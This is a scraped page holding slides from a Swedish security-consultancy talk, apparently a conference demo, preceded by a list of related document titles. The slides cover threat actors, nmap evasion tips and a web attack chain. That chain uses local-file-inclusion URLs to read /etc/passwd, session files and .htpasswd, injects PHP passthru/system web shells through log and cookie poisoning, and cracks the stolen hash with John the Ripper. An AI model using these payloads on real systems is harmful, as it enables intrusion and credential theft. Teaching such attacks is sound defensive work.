IT-Forum 16:00 17:00



Relevanta dokument
Att installera och använda nmap

Utseende Dovado Tiny:

Operativsystem. Informationsteknologi sommarkurs 5p, Agenda. Slideset 7. Exempel på operativsystem. Operativsystem

Introduktion. Välkommen till kursen DT1035 Kriminalteknisk (forensisk) Datavetenskap 1 Lärare: Hans Jones hjo@du.se Hans Edy Mårtensson hem@du.

Statistiska centralbyrån

TEKNISK SPECIFIKATION. för TIDOMAT Portal version 1.3.1

LABORATIONSRAPPORT Säkerhet och Sårbarhet Laboration 1 Brandväggar

Säkerhet genom simpel nätverksutrustning. Högskoleingenjörsexamensarbete Fredrik Folke

Avancerade Webbteknologier

Instruktion för användande av Citrix MetaFrame

Systemkrav och tekniska förutsättningar

Installationsanvisningar VisiWeb. Ansvarig: Visi Closetalk AB Version: 2.3 Datum: Mottagare: Visi Web kund

Passersystem VAKA 10

Vaka Användarmanual. Användarmanual. VAKA Passersystem

Överflyttning av värld

Webbservrar, severskript & webbproduktion

Att Säkra Internet Backbone

Undersökningsprotokoll

Statistiska centralbyrån

Byta lösenord på en Ingate Firewall 1450/1500/1550/1600/1650/1900 eller Ingate SIParator 45/50/55/60/65/90

3. Steg för steg. Kör IPv6 på riktigt med FortiGate! Principen är enkel:

Laboration 4 Rekognosering och nätverksattacker

InstalationGuide. English. MODEL:150NHighGain/30NMiniUSBAdapter

1.1 Kravbeskrivning för all utrustning eller system som ska kunna anslutas till NLLnet

Tekniska lösningar som stödjer GDPR

Vad är en dator? Introduktion till datorer och nätverk. Pontus Haglund Institutionen för datavetenskap (IDA) 21 augusti 2018

ETSF Routingprojektet WILLIAM TÄRNEBERG

Vaka Användarmanual. Användarmanual. VAKA Passersystem. axema Sida Vaka Användarmanual

Tekniska lösningar som stödjer GDPR

SKA v6. Godkänd: Rev: April. SKA v6 1(19)

Ladda upp filer fra n PLC till PC

ETSF Routingprojektet JENS ANDERSSON

2 Lägg CD-skivan i CD-enheten.

Riktlinjer: avveckling av AppleTalk-routing i LUNET

Innehållsförteckning. 1. Log in 2. Home 3. My online visitors 4. Active chat 5. Settings

LABBINTRODUKTION. Laboranter: Kurs: - Sonny Johansson, Sigurd Israelsson. Utskriftsdatum:

För installationer av SQL Server som inte görs från Hogias installation måste följande inställningar göras:

Instruktioner för Internetanslutning

Lathund Distansarbete. Lathund. Distansarbete via cap.lio.se i Google Chrome (Windows 8.1)

Planering och RA/DHCPv6 i detalj

C64 4G-router 4G-router för VAKA fjärradministration, IP-porttelefoni och internetbokning.

3) Routern kontrollerar nu om destinationen återfinns i Routingtabellen av för att se om det finns en väg (route) till denna remote ost.

Om integritet och sekretess på nätet. Stefan Ternvald, SeniorNet Lidingö,

BiPAC 7402R2. ADSL2+ VPN Firewall Router. Snabbstartsguide

Versioner och språk. ComAround Zero

Switch- och WAN- teknik. F6: Frame Relay och Network Security

Manual - Phonera Online Backup

Installation av Storegate Online Backup.

Säkerhet. Vad är det vi pratar om??

Handbok. Procapita Vård och Omsorg Drifthandledning Gallring ver 9.2w

Innehålls förteckning

SUNET:s Box-tjänst. SUNET-veckan Malmö

Grundläggande rou-ngteknik

Version Namn Datum Beskrivning 1.0 Förutsättningar Vitec Ekonomi 1.1 Marie Justering för krav på Windows Server

LAN Port: 4 X RJ45 10/100BASE-TX Fast Ethernet med Auto MDI/MDIX. Resetknapp: Återställer enheten till fabriks inställningar

Installationsinstruktion med rekommenderade inställningar Extern Uppkoppling med OTP och SITHS-kort mot Landstinget Västmanland

Windows 8 och det nya arbetslivet. Magnus Holmér IT strategisk rådgivare

Incidenthantering ur ledningskontra teknisktperspektiv. Stefan Öhlund & André Rickardsson

Kunskapsbank ICARUS DB

START FINNS DET EN LÖSNING FÖR MIN VERKSAMHET HOS HANS TØRSLEFF MANAGEMENT SYSTEM? Behöver du ett enda system för tidsregistrering?

TEKNISK SPECIFIKATION. för TIDOMAT Portal version 1.6.0

Installationsanvisningar fiberstream (LAN) Version 1.0

Vägen till det Hybrida molnet Hur byggde vi vårt hybrida moln och vad säger kunderna som har tagit steget? Jonas Emilsson Anders Jansson

BIPAC-7402 / 7402W (Trådlös) ADSL VPN Firewall Router med 3DES-accelerator Snabbstartsguide

DIG IN TO Administration av nätverk- och serverutrustning

VAKA 10 Passersystem Driftsättning & Snabbstart

Installationsanvisning Boss delad databas

DI-624+ AirPlus G+ trådlös 2.4 GHz router

RUTINBESKRIVNING FÖR INSTALLATION AV KAMERA

Trådlöst nätverk MAHSTAFF Mac OS X

DATA CIRKEL VÅREN 2014

VAKA Passersystem. Vaka Användarmanual. Användarmanual. axema Sida 1. Se hemsida / support för senaste manualerna.

Fjärruppkoppling med MRD Industriell 3G-Router KI00282A

ETSF Routingprojektet JENS ANDERSSON

Säkerhet och förtroende

DI-714P+ Innan du börjar. Kontrollera förpackningens innehåll. 2.4GHz trådlös router och printerserver. DI-714P+ 2.4GHz trådlös router

Microsoft Office historik. - making IT easier

Uppdatering av MONITOR Mobile 8.0

Att sätta upp trådlöst med Cisco Controller 2100 series och Cisco AP 1200 series

MANUAL. MEDICINSKT TANGENTBORD Compliance Standard K105C02-SWE. rev

Allmän information ITS Fjärrskrivbord

Handbok. Procapita Vård och Omsorg Drifthandledning Gallring ver

Grupp Policys. Elektronikcentrum i Svängsta Utbildning AB

Terminal vad det är vad man kan göra med den

Meritförteckning. Mer än 3 års professionell erfarenhet av PHP, SQL, C# och VB.NET,

FlexiTid Extern webbokning. Copyright Datatal AB. Med ensamrätt. Copyright 2013 Datatal AB. All rights reserved.

Installationsmanual OpenOffice 3.0

DIG IN TO Administration av nätverk- och serverutrustning

Compact Store - Systemkrav

Inlämningsmappar. Inlämningsmappar. 1. Var hittar jag inlämningsmapparna?

Passersystem VAKA 10

Programvara på Nada. Johan Berglund Systemgruppen, Nada

Snabbguide Installation Linkmanager och ansluta till SiteManager

INSTALLATIONSINSTRUKTIONER FÖR VIDA INNEHÅLL

Introduktion till programmering, hösten 2011

Grundläggande rou-ngteknik. F2: Kapitel 2 och 3

Människa dator- interaktion Therese Andersson, Fredrik Forsmo och Joakim Johansson WP11D. Inledning

Detta är en guide för snabbinstallation av IP kameran För fullständig programfunktion hänvisar vi till medföljande manual.

Byta lösenord på en Ingate Firewall 1180/1190/SIParator 18/19. Lisa Hallingström Paul Donald Bogdan Musat Adnan Khalid

Transkript:

IT-Forum 16:00 17:00

Om Atea Tredje störst i Europa! NOK 15 miljarder i omsättning Marknadsledande IT-infrastrukturimplementatör 72 orter inom Norden och Baltikum 4 500 anställda 2 200 konsulter & tekniker 6 500 certifieringar 23 000 kunder 2

Om mig Affärsansvarig säkerhet / IT-säkerhetsspecialist på Atea Jobbat som IT-säkerhetskonsult sedan 1998, bland annat för FBI, Microsoft, svenska myndigheter och svenskt rättsväsende. Utvecklare (IA-32 assembler, C/C++/C#, Python, Ruby, PHP, VB.NET, Java). Windows, Linux och BSD-miljö. Antimalwaremjukvaran Cassandra som skyddade datorn från trojaner och bakdörrar. Över 40 000 användare totalt, bl a US Air Force, FBI, NASA, UK Patent office m.fl. Bygger mjukvara, tar isär mjukvara Bank/Finans/Försäkring Myndigheter Känsliga bolag och inrättningar i Sverige och utomlands

Cool kille 1999

1997-1998 Security.nu

Bubbel

Winscanner

Process handler för Windows 95

Cassandra Antimalware

Cassandra Antimalware

Wireless PenKnife

Världens första molnbaserade exploit

1999

2012

Common vulnerabilities and Exposure

Sårbarhetstrend

Offensiva aktörer Aktör Icke organiserad Motivation Äga information, tjäna personliga syften Organiserad Militär / underrättelsetjänst Tjäna pengar, förmedla politiska budskap, konkurrera med jämbördiga Sabotage. Kontroll över strategiskt viktig information. Information som skapar fördel i tider av fred eller konflikt. Sprida desinformation.

Organiserade

Få betalt för virusinfektioner

Militär aktör

Organiserade parter

Över 64 000 ip-adresser

Traceroute jj$ traceroute login.uib.no traceroute to loginb.uib.no (129.177.13.203), 64 hops max, 52 byte packets 1 91.195.58.3 (91.195.58.3) 22.696 ms 19.024 ms 19.653 ms 2 83.136.89.137 (83.136.89.137) 22.487 ms 20.623 ms 20.000 ms 3 dk-uni.nordu.net (192.38.7.50) 22.648 ms 20.392 ms 21.956 ms 4 stolav-gw2.uninett.no (109.105.102.26) 30.882 ms 30.356 ms 30.011 ms 5 ifi2-gw.uninett.no (128.39.254.205) 44.357 ms 35.378 ms 33.993 ms 6 bergen-gw.uninett.no (128.39.255.126) 39.349 ms 39.923 ms 42.068 ms 7 uib-bt-gw.uib.no (158.37.1.190) 40.142 ms 39.230 ms 40.029 ms 8 loginb.uib.no (129.177.13.203) 40.080 ms 49.724 ms 39.920 ms

Utmaningar Nmap scannar 1000 portar per default Lösning: -p eller top-ports Mängden trafik kan trigga filtrering av vår IP (brandvägg/ids/ips) Möjliga lösningar: Fördröjning mellan syn-paketen Multipla interface (en0, en1, en2 etc under Mac OS) Fragmentering (vissa system klarar inte att hantera detta) Decoy-trafik I vissa fall: src port

Intressanta Hostar DNS Intressanta hostar har ofta DNS-namn Intressanta webbhostar länkar ibland till varandra Google indexerar ofta webbhostar

Access to Cisco Works 2000

Access till maskin med Windows XP Professional

LDAPinjektion

Cracka htpasswd-lösenord

Local file inclusion När vi lyckas förändra exempelvis en PHP-sidas uppbyggnad genom att peka mot PHP-kod Tillåter man uploads av någon form? (profilbild, bifogade filer etc) Hur är LFI:n utformad, har vi frihet att t ex injicera php-filter? http://web/demo/index.php?template=/etc/passwd http://web/demo/index.php?template=/etc/passwd%00 http://web/demo/index.php?template=/proc/self/status%00 http://web/demo/index.php?template=php://filter/convert.base64-encode/resource=index.php%00 http://web/demo/index.php?template=/tmp/sess_1d4bd392e0fab8d51d88b2fead6b152e%00

Log poisoning /proc/self/fd/n http://web/demo/index.php?template=/proc/self/fd/0%00 http://web/demo/index.php?template=/var/log/apache2/access.log%00 failed to open stream: Permission denied PHP-inject <?php passthru($_get[jj]);?> ~/Development/Python/b64e "<?php passthru(\$_get[jj]);?>" PD9waHAgcGFzc3RocnUoJF9HRVRbampdKTs/Pg== jj$ ~/Development/Python/b64 PD9waHAgcGFzc3RocnUoJF9HRVRbampdKTs/Pg== <?php passthru($_get[jj]);?>

Avancerad cookie poisoning http://web/demo/index.php?pref=%3c?php%20phpinfo();?%3e&template=/tmp/ sess_1d4bd392e0fab8d51d88b2fead6b152e%00 http://web/demo/index.php?pref=%3c?php%20system($_get[jj]);%20? %3E&jj=ls%20/etc&template=/tmp/sess_1d4bd392e0fab8d51d88b2fead6b152e %00

http://web/demo/admin/ Lösenordsskyddad Vi vet hur strukturen ser ut /var/www/vtigercrm/demo/admin/index.php Vi kan ta reda på vart htpasswd-filen finns som skyddar katalogen /etc/apache2/apache2.conf /etc/apache2/ports.conf http://web/demo/index.php?template=/etc/apache2/apache2.conf%00 http://web/demo/index.php?template=/etc/apache2/ports.conf%00 http://web/demo/index.php?template=/etc/apache2/sites-enabled/000-default%00 http://web/demo/index.php?template=/var/www/.htpasswd%00 admin:.m97hktxxtrpa John the ripper, DES-krypto john --users=admin --wordlist=/root/desktop/demo_pass.txt --format=des ~/Desktop/demohash.txt

Loaded 1 password hash (Traditional DES [128/128 BS SSE2]) mainzel (admin) guesses: 1 time: 0:00:00:00 DONE (Tue Apr 24 18:45:14 2012) c/s: 25600 trying: rbc0625-638i8 Use the "--show" option to display all of the cracked passwords reliably

jonathan.james@atea.se jonathanj.com Twitter: areusecure 08-4774730